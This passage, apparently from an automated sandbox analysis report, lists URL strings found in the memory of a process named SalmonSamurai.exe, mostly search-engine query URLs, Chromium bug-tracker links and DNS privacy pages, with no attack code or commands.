Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.icohttp://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.icohttp://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.icohttp://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.icohttp://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.icohttp://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.icohttp://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://szukaj.wp.pl/szukaj.html?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delfi.lv/search_all/?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.icohttp://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/api/suggestOS?suggestQuery=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.icohttp://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.icohttp://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-capture-time
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/271
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/286
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/342
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/343
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/36
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/402
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/42
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/434
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/480
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/537
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/549
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/56
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/582
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/633
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/666
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/667
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/673
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/727
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/776
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/792
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/838
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/840
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/949
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/960
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/966
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/new
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreating
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint.
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint/1003
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dawn.googlesource.com/dawn/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.icohttps://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.icohttps://search.gmx.com/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.google/dns-query
